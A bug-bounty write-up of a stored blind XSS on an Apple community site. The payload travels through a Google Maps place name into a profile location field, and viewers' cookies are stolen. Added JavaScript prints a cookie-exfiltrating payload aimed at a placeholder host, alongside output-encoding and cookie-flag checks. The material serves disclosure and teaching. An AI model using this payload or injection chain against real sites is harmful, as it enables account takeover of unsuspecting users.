How I got a bug at Apple that leads to account takeover of any user who views my profile
Hi team, I am Abdelkader Mouaz, my handle is Hamzadzworm. Today I will share with you a bug that leads to the takeover of the account of any user who simply views my profile.
I had been hunting on Apple for a few days. I did subdomain enumeration with multiple tools to collect every subdomain I could find, and ended up with about 20K live subdomains. It was a big list, but I had plenty of time, so I kept testing them one by one.
I found an interesting one: a community subdomain that you can log in to with your iCloud account. My thinking was that if I got an account takeover there, I would be able to take over iCloud accounts.
I kept searching for a few more days until I found an interesting endpoint: the location feature, where I could put a location on my profile, but I could not fill it in manually.
Location addresses were added automatically: you type an address and the site picks the matching location from Apple Maps. Here is an example of such a link:
maps.apple.com/?&q=Test&address=Test
It redirected me to Google Maps with the query Test/Test.
That was interesting, so I added a new place that was not listed on Google Maps and then shared it through the endpoint I had found:
maps.apple.com/?&q=Test&address=Test
After adding the place, I put a blind XSS payload in the Google place name and submitted it. It was accepted, though of course it did not execute on Google.
But once I linked it through maps.apple.com (since Apple Maps was pulling the place data from Google Maps), I was able to build a final payload and add it to my profile location.
It appeared under (Lieu), which means Location, as you can see in the screenshot below.
And yes, it executed.
Then I added a blind XSS payload to the place, opened a new account and viewed my profile containing the blind XSS. It fired, and the cookies of that account arrived in my XSS Hunter account, which allowed me to take over the account.
I hope you enjoyed the write-up. Leave a comment if you liked it :)
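The chain above is a stored XSS whose source is a third party (a Google Maps place name, passed through Apple Maps into the community profile's location field), and the takeover only works because the session cookie could be read by JavaScript and sent to XSS Hunter. The following is an added example written for this page, not code from the original post or from Apple: it models the vulnerable sink beside the encoded one, and checks the cookie flags that would have blunted the exfiltration. The payload string, the callback host, the cookie headers and the function names are all constructed for illustration.

```javascript
// Added example (not from the original post): a third-party place name
// rendered into a profile page, the vulnerable and the encoded rendering,
// and a Set-Cookie check for the flags that stop document.cookie exfiltration.
// The payload, callback host and cookie headers below are constructed.

// A blind XSS payload of the kind an attacker could store as a map place name.
// callback.example is a placeholder, not a real XSS Hunter endpoint.
const STORED_PLACE_NAME =
  '<img src=x onerror="new Image().src=\'https://callback.example/?c=\'+document.cookie">';

// Minimal HTML encoder for text nodes and double-quoted attribute values.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable: the third-party place name is concatenated straight into markup,
// which is what the profile's (Lieu) field effectively did.
function renderLocationUnsafe(placeName) {
  return `<div class="lieu">${placeName}</div>`;
}

// Fixed: the same value is encoded, so the browser shows the payload as text.
function renderLocationSafe(placeName) {
  return `<div class="lieu">${escapeHtml(placeName)}</div>`;
}

// Sink check: strip the wrapper element and look for any raw tag opener left
// in the rendered value. Encoded output has no '<' followed by a tag name.
function reflectsRawMarkup(html) {
  const inner = html.replace(/^<div class="lieu">/, '').replace(/<\/div>$/, '');
  return /<[a-z!\/]/i.test(inner);
}

// Parse a Set-Cookie header value into name, value and lower-cased attributes.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((p) => p.trim());
  const eq = pair.indexOf('=');
  const flags = {};
  for (const a of attrs) {
    const [k, v] = a.split('=');
    flags[k.toLowerCase()] = v === undefined ? true : v;
  }
  return { name: pair.slice(0, eq), value: pair.slice(eq + 1), flags };
}

// A session cookie readable from document.cookie is exactly what the blind XSS
// exfiltrates; HttpOnly blocks that read and Secure keeps it off plaintext HTTP.
// (XSS can still act on the victim's behalf in-page, so encoding is the real fix.)
function sessionCookieIsProtected(header) {
  const c = parseSetCookie(header);
  return c.flags.httponly === true && c.flags.secure === true;
}

// Constructed sample headers for the check.
const WEAK_COOKIE = 'session=abc123; Path=/; SameSite=Lax';
const HARDENED_COOKIE = 'session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax';

console.log('unsafe render :', renderLocationUnsafe(STORED_PLACE_NAME));
console.log('safe render   :', renderLocationSafe(STORED_PLACE_NAME));
console.log('raw markup survives (unsafe)?', reflectsRawMarkup(renderLocationUnsafe(STORED_PLACE_NAME)));
console.log('raw markup survives (safe)?  ', reflectsRawMarkup(renderLocationSafe(STORED_PLACE_NAME)));
console.log('weak cookie protected?    ', sessionCookieIsProtected(WEAK_COOKIE));
console.log('hardened cookie protected?', sessionCookieIsProtected(HARDENED_COOKIE));
```

Run it with node. The point of the two checks together: output encoding at the sink stops the payload from executing no matter which upstream service (Google Maps, Apple Maps) it travelled through, while HttpOnly on the session cookie limits what a payload can steal if some other sink is missed.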